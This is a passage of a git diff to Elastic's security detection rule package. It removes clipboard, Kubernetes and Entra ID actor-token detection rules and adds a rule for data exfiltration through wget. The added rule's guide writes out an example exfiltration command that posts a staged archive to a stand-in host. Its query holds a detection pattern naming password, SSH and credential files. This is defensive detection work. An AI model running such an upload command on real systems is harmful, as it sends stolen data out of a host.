or \"copyq\") and\nnot process.parent.name:(\"bwrap\" or \"micro\")\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^9.0.0" - }, - { - "package": "auditd_manager", - "version": "^1.18.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.parent.name", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "884e87cc-c67b-4c90-a4ed-e1e24a940c82", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Collection", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Auditd Manager", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0009", - "name": "Collection", - "reference": "https://attack.mitre.org/tactics/TA0009/" - }, - "technique": [ - { - "id": "T1115", - "name": "Clipboard Data", - "reference": "https://attack.mitre.org/techniques/T1115/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 7 - }, - "id": "884e87cc-c67b-4c90-a4ed-e1e24a940c82_7", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8a1db198-da6f-4500-b985-7fe2457300af_1.json b/packages/security_detection_engine/kibana/security_rule/8a1db198-da6f-4500-b985-7fe2457300af_1.json deleted file mode 100644 index 989c305020a..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/8a1db198-da6f-4500-b985-7fe2457300af_1.json +++ /dev/null @@ -1,77 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects unusual request responses in Kubernetes audit logs through the use of the \"new_terms\" rule type. In production environments, default API requests are typically made by system components or trusted users, who are expected to have a consistent user agent and allowed response annotations. By monitoring for anomalies in the username and response annotations, this rule helps identify potential unauthorized access or misconfigurations in the Kubernetes environment.", - "history_window_start": "now-10d", - "index": [ - "logs-kubernetes.audit_logs-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Kubernetes Unusual Decision by User Agent", - "new_terms_fields": [ - "kubernetes.audit.annotations.authorization_k8s_io/decision", - "kubernetes.audit.user.username", - "user_agent.original" - ], - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Kubernetes Unusual Decision by User Agent\n\nKubernetes orchestrates containerized applications, relying on API requests for operations. Typically, these requests originate from system components or trusted users with consistent user agents. Adversaries might exploit this by using atypical user agents to mask unauthorized access or misconfigurations. The detection rule identifies anomalies in user agents and response annotations, signaling potential threats in the Kubernetes environment.\n\n### Possible investigation steps\n\n- Review the Kubernetes audit logs for entries where the user_agent.original field is present to identify any unusual or unexpected user agents.\n- Cross-reference the identified user agents with known system components and trusted users to determine if the user agent is legitimate or potentially malicious.\n- Examine the kubernetes.audit.stage field for \"ResponseComplete\" entries to understand the context and outcome of the requests associated with the unusual user agent.\n- Investigate the source IP addresses and associated usernames in the audit logs to identify any patterns or anomalies that could indicate unauthorized access.\n- Check for any recent changes or deployments in the Kubernetes environment that might explain the presence of unusual user agents or unexpected behavior.\n- Assess the risk and impact of the detected anomaly by considering the sensitivity of the accessed resources and the permissions associated with the user account involved.\n\n### False positive analysis\n\n- System components or trusted users with legitimate but infrequent user agents may trigger the rule. To manage this, identify these user agents and add them to an exception list to prevent unnecessary alerts.\n- Automated scripts or tools used for maintenance or monitoring might use unique user agents. Regularly review these tools and update the exception list to include their user agents if they are verified as non-threatening.\n- New deployments or updates to Kubernetes components can introduce new user agents temporarily. Monitor these changes and adjust the rule exceptions accordingly to accommodate expected behavior during these periods.\n- Third-party integrations or plugins may use distinct user agents. Validate these integrations and, if deemed safe, include their user agents in the exception list to reduce false positives.\n\n### Response and remediation\n\n- Immediately isolate the affected Kubernetes node or cluster to prevent further unauthorized access or potential lateral movement by the adversary.\n- Review and terminate any suspicious or unauthorized sessions identified in the audit logs to cut off any active malicious activity.\n- Revoke and rotate credentials associated with the compromised user agent to prevent further unauthorized access using the same credentials.\n- Conduct a thorough review of the affected system's configurations and permissions to identify and rectify any misconfigurations or overly permissive access controls.\n- Implement additional monitoring and logging for the affected systems to detect any further anomalies or unauthorized activities promptly.\n- Escalate the incident to the security operations team for a comprehensive investigation and to determine if any data exfiltration or further compromise has occurred.\n- Update and enhance detection rules and alerts to better identify similar anomalies in user agents and response annotations in the future, ensuring quicker response times.\n", - "query": "host.os.type:\"linux\" and event.dataset:\"kubernetes.audit_logs\" and kubernetes.audit.stage:\"ResponseComplete\" and user_agent.original:*\n", - "related_integrations": [ - { - "package": "kubernetes", - "version": "^1.4.1" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": false, - "name": "kubernetes.audit.stage", - "type": "keyword" - }, - { - "ecs": true, - "name": "user_agent.original", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "8a1db198-da6f-4500-b985-7fe2457300af", - "severity": "low", - "tags": [ - "Domain: Kubernetes", - "Domain: Container", - "Use Case: Threat Detection", - "Data Source: Kubernetes", - "Tactic: Execution", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 1 - }, - "id": "8a1db198-da6f-4500-b985-7fe2457300af_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8d8c0b55-ef27-4c20-959f-fa8dd3ac25e6_2.json b/packages/security_detection_engine/kibana/security_rule/8d8c0b55-ef27-4c20-959f-fa8dd3ac25e6_2.json new file mode 100644 index 00000000000..85cd0c210a0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8d8c0b55-ef27-4c20-959f-fa8dd3ac25e6_2.json @@ -0,0 +1,119 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the use of wget to upload files to an internet server. Threat actors often will collect data on a system and attempt to exfiltrate it back to their command and control servers. Use of wget in this way, while not inherently malicious, should be considered highly abnormal and suspicious activity.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "endgame-*", + "logs-auditd_manager.auditd-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process*", + "logs-sentinel_one_cloud_funnel.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Data Exfiltration Through Wget", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential Data Exfiltration Through Wget\n\nThis rule flags Linux processes that launch wget with options that upload a local file via HTTP POST, a behavior used to exfiltrate staged data to an external server. Attackers gather files, compress them in /tmp, then execute wget --post-file=/tmp/loot.tar.gz https://example.com/upload from a non-interactive shell or cron job to covertly push the archive out over standard web traffic.\n\n### Possible investigation steps\n\n- Pull the full command line to extract the posted file path, verify the file still exists, capture size/timestamps, and hash its contents to gauge sensitivity and origin.\n- Review the process tree and session context (parent, user, TTY, cron/systemd/container) and correlate with recent logins or scheduler entries to determine whether this was automated or a remote shell action.\n- Enrich the destination endpoint with DNS, WHOIS, certificate, proxy, and egress firewall logs, and check for prior communications from this host to the same domain/IP to assess legitimacy.\n- Pivot 30\u201360 minutes prior on the host/user for staging activity such as tar/gzip in /tmp, bulk file collection, or discovery commands, and interrogate shell history and filesystem events tied to the posted file.\n- If the file was removed post-upload, attempt recovery from EDR or backups and estimate exfil volume and content types via proxy or egress gateway logs to determine impact and drive containment.\n\n### False positive analysis\n\n- A maintenance or monitoring script run via cron posts log archives or configuration snapshots using wget --post-file to an internal HTTP endpoint for routine diagnostics.\n- An administrator or developer testing a web form or API uses wget --body-file to POST a sample file during troubleshooting, producing a benign one-off event.\n\n### Response and remediation\n\n- Immediately isolate the host, terminate the offending wget process, block outbound HTTP(S) to the destination domain/IP seen in the command wget --post-file=/path/to/file https://example.com/upload, and quarantine the posted file path and its parent directory.\n- Identify and disable any cron, systemd, or shell script that invoked wget with --post-file or --body-file (e.g., entries in /etc/cron.d/, user crontabs, or /home/user/.local/bin/upload.sh), delete the script, and revoke the invoking account\u2019s API tokens and SSH keys.\n- Remove staged archives and temp files referenced in the upload (e.g., /tmp/loot.tar.gz and /var/tmp/*.gz), delete companion tooling or collection scripts found alongside them, and reimage the host if system integrity cannot be assured.\n- If the posted content includes credentials, source code, or customer data, rotate affected passwords/keys, invalidate tokens, notify data owners, and restore impacted systems or files from known-good backups.\n- Escalate to incident response and initiate wider containment if the destination domain/IP is not owned by the organization or resolves to an anonymizing/VPS service, if multiple hosts exhibit wget --post-file from non-interactive sessions, or if the uploader executed as root.\n- Harden by enforcing SELinux/AppArmor policies that restrict wget/curl from posting files, requiring egress web proxy allowlists for HTTP POST destinations, adding detections for wget --post-file/--body-file and curl --upload-file/-F, and removing wget from systems where it is unnecessary.\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\", \"start\", \"ProcessRollup2\", \"executed\", \"process_started\") and\nprocess.name == \"wget\" and ?process.parent.executable != null and (\n process.args like (\"--post-file*\", \"--post-data*\", \"--body-file*\") or\n (\n process.command_line like (\"*cat*\", \"*base64*\") and\n process.command_line like (\n \"*/etc/passwd*\", \"*/etc/shadow*\", \"*~/.ssh/*\", \"*.env*\", \"*credentials*\", \"*/tmp/*\",\n \"*/var/tmp/*\", \"*/dev/shm/*\", \"*/home/*/*\", \"*/root/*\"\n )\n )\n) and\n(\n process.command_line like (\"*http:*\", \"*https:*\") or\n process.command_line regex \".*[0-9]{1,3}\\\\.[0-9]{1,3}\\\\.[0-9]{1,3}\\\\.[0-9]{1,3}.*\"\n)\n", + "references": [ + "https://gtfobins.github.io/gtfobins/wget/", + "https://cloud.google.com/blog/topics/threat-intelligence/disrupting-gridtide-global-espionage-campaign?hl=en" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "8d8c0b55-ef27-4c20-959f-fa8dd3ac25e6", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Data Source: Auditd Manager", + "Data Source: Elastic Defend", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1048", + "name": "Exfiltration Over Alternative Protocol", + "reference": "https://attack.mitre.org/techniques/T1048/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "8d8c0b55-ef27-4c20-959f-fa8dd3ac25e6_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8e7a4f2c-9b3d-4e5a-a1b6-c2d8f7e9b3a5_2.json b/packages/security_detection_engine/kibana/security_rule/8e7a4f2c-9b3d-4e5a-a1b6-c2d8f7e9b3a5_2.json deleted file mode 100644 index 4301fd8d5c2..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/8e7a4f2c-9b3d-4e5a-a1b6-c2d8f7e9b3a5_2.json +++ /dev/null @@ -1,844 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies potential abuse of actor tokens in Microsoft Entra ID audit logs. Actor tokens are undocumented backend mechanisms used by Microsoft for service-to-service (S2S) operations, allowing services to perform actions on behalf of users. These tokens appear in logs with the service's display name but the impersonated user's UPN. While some legitimate Microsoft operations use actor tokens, unexpected usage may indicate exploitation of CVE-2025-55241, which allowed unauthorized access to Azure AD Graph API across tenants before being patched by Microsoft.", - "false_positives": [ - "Creating specific groups via the Exchange Online PowerShell module will make Exchange use an Actor token on your behalf. The rule excludes group operations and directory feature operations to reduce false positives from these legitimate administrative activities." - ], - "from": "now-9m", - "interval": "8m", - "language": "esql", - "license": "Elastic License v2", - "name": "Entra ID Actor Token User Impersonation Abuse", - "note": "## Triage and analysis\n\n### Investigating Entra ID Actor Token User Impersonation Abuse\n\nThis rule detects when Microsoft services use actor tokens to perform operations in audit logs. Actor tokens are undocumented backend mechanisms used by Microsoft for service-to-service (S2S) communication. They appear with a mismatch: the service's display name but the impersonated user's UPN. While some operations legitimately use actor tokens, unexpected usage may indicate exploitation of CVE-2025-55241, which allowed attackers to obtain Global Admin privileges across any Entra ID tenant. Note that this vulnerability has been patched by Microsoft as of September 2025.\n\n### Possible investigation steps\n\n- Review the `azure.auditlogs.properties.initiated_by.user.userPrincipalName` field to identify which service principals are exhibiting this behavior.\n- Check the `azure.auditlogs.properties.initiated_by.user.displayName` to confirm these are legitimate Microsoft services.\n- Analyze the actions performed by these service principals - look for privilege escalations, permission grants, or unusual administrative operations.\n- Review the timing and frequency of these events to identify potential attack patterns or automated exploitation.\n- Cross-reference with recent administrative changes or service configurations that might explain legitimate use cases.\n- Check if any new applications or service principals were registered recently that could be related to this activity.\n- Investigate any correlation with other suspicious authentication events or privilege escalation attempts in your tenant.\n\n### False positive analysis\n\n- Legitimate Microsoft service migrations or updates may temporarily exhibit this behavior.\n- Third-party integrations using Microsoft Graph or other APIs might trigger this pattern during normal operations.\n- Automated administrative tools or scripts using service principal authentication could be misconfigured.\n\n### Response and remediation\n\n- Immediately review and audit all service principal permissions and recent consent grants in your Entra ID tenant.\n- Disable or restrict any suspicious service principals exhibiting this behavior until verified.\n- Review and revoke any unnecessary application permissions, especially those with high privileges.\n- Enable and review Entra ID audit logs for any permission grants or role assignments made by these service principals.\n- Implement Conditional Access policies to restrict service principal authentication from unexpected locations or conditions.\n- Enable Entra ID Identity Protection to detect and respond to risky service principal behaviors.\n- Review and harden application consent policies to prevent unauthorized service principal registrations.\n- Consider implementing privileged identity management (PIM) for service principal role assignments.\n", - "query": "from logs-azure.auditlogs-* metadata _id, _version, _index\n| where azure.auditlogs.properties.initiated_by.user.displayName in (\n \"Office 365 Exchange Online\",\n \"Skype for Business Online\",\n \"Dataverse\",\n \"Office 365 SharePoint Online\",\n \"Microsoft Dynamics ERP\"\n ) and\n not azure.auditlogs.operation_name like \"*group*\" and\n azure.auditlogs.operation_name != \"Set directory feature on tenant\"\n and azure.auditlogs.properties.initiated_by.user.userPrincipalName rlike \".+@[A-Za-z0-9.]+\\\\.[A-Za-z]{2,}\"\n| keep\n _id,\n @timestamp,\n azure.*,\n client.*,\n event.*,\n source.*\n", - "references": [ - "https://dirkjanm.io/obtaining-global-admin-in-every-entra-id-tenant-with-actor-tokens/", - "https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-55241" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "@timestamp", - "type": "date" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.category", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.identity", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.level", - "type": "double" - }, - { - "ecs": false, - "name": "azure.auditlogs.operation_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.operation_version", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.activity_datetime", - "type": "date" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.activity_display_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.additional_details.key", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.additional_details.user_agent", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.additional_details.value", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.authentication_protocol", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.category", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.correlation_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.id", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.initiated_by.app.appId", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.initiated_by.app.displayName", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.initiated_by.app.servicePrincipalId", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.initiated_by.app.servicePrincipalName", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.initiated_by.user.displayName", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.initiated_by.user.id", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.initiated_by.user.ipAddress", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.initiated_by.user.roles", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.initiated_by.user.userPrincipalName", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.logged_by_service", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.operation_type", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.result", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.result_reason", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.*.display_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.*.id", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.*.ip_address", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.*.modified_properties.*.display_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.*.modified_properties.*.new_value", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.*.modified_properties.*.old_value", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.*.type", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.*.user_principal_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.0.modified_properties.0.new_value", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.0.modified_properties.0.old_value", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.0.modified_properties.1.display_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.0.modified_properties.1.new_value", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.0.modified_properties.2.new_value", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.0.modified_properties.3.new_value", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.result_description", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.result_signature", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.tenant_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.correlation_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.resource.authorization_rule", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.resource.group", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.resource.id", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.resource.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.resource.namespace", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.resource.provider", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.subscription_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.tenant_id", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.address", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.as.number", - "type": "long" - }, - { - "ecs": true, - "name": "client.as.organization.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.bytes", - "type": "long" - }, - { - "ecs": true, - "name": "client.domain", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.geo.city_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.geo.continent_code", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.geo.continent_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.geo.country_iso_code", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.geo.country_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.geo.location", - "type": "geo_point" - }, - { - "ecs": true, - "name": "client.geo.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.geo.postal_code", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.geo.region_iso_code", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.geo.region_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.geo.timezone", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.ip", - "type": "ip" - }, - { - "ecs": true, - "name": "client.mac", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.nat.ip", - "type": "ip" - }, - { - "ecs": true, - "name": "client.nat.port", - "type": "long" - }, - { - "ecs": true, - "name": "client.packets", - "type": "long" - }, - { - "ecs": true, - "name": "client.port", - "type": "long" - }, - { - "ecs": true, - "name": "client.registered_domain", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.subdomain", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.top_level_domain", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.user.domain", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.user.email", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.user.full_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.user.group.domain", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.user.group.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.user.group.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.user.hash", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.user.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.user.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.user.roles", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.agent_id_status", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.code", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.created", - "type": "date" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.duration", - "type": "long" - }, - { - "ecs": true, - "name": "event.end", - "type": "date" - }, - { - "ecs": true, - "name": "event.hash", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.ingested", - "type": "date" - }, - { - "ecs": true, - "name": "event.kind", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.module", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.original", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.reason", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.reference", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.risk_score", - "type": "float" - }, - { - "ecs": true, - "name": "event.risk_score_norm", - "type": "float" - }, - { - "ecs": true, - "name": "event.sequence", - "type": "long" - }, - { - "ecs": true, - "name": "event.severity", - "type": "long" - }, - { - "ecs": true, - "name": "event.start", - "type": "date" - }, - { - "ecs": true, - "name": "event.timezone", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.url", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.address", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.as.number", - "type": "long" - }, - { - "ecs": true, - "name": "source.as.organization.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.bytes", - "type": "long" - }, - { - "ecs": true, - "name": "source.domain", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.city_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.continent_code", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.continent_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.country_iso_code", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.country_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.location", - "type": "geo_point" - }, - { - "ecs": true, - "name": "source.geo.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.postal_code", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.region_iso_code", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.region_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.timezone", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.ip", - "type": "ip" - }, - { - "ecs": true, - "name": "source.mac", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.nat.ip", - "type": "ip" - }, - { - "ecs": true, - "name": "source.nat.port", - "type": "long" - }, - { - "ecs": true, - "name": "source.packets", - "type": "long" - }, - { - "ecs": true, - "name": "source.port", - "type": "long" - }, - { - "ecs": true, - "name": "source.registered_domain", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.subdomain", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.top_level_domain", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.user.domain", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.user.email", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.user.full_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.user.group.domain", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.user.group.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.user.group.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.user.hash", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.user.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.user.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.user.roles", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "8e7a4f2c-9b3d-4e5a-a1b6-c2d8f7e9b3a5", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Domain: Identity", - "Data Source: Azure", - "Data Source: Entra ID", - "Data Source: Entra Audit Logs", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/", - "subtechnique": [ - { - 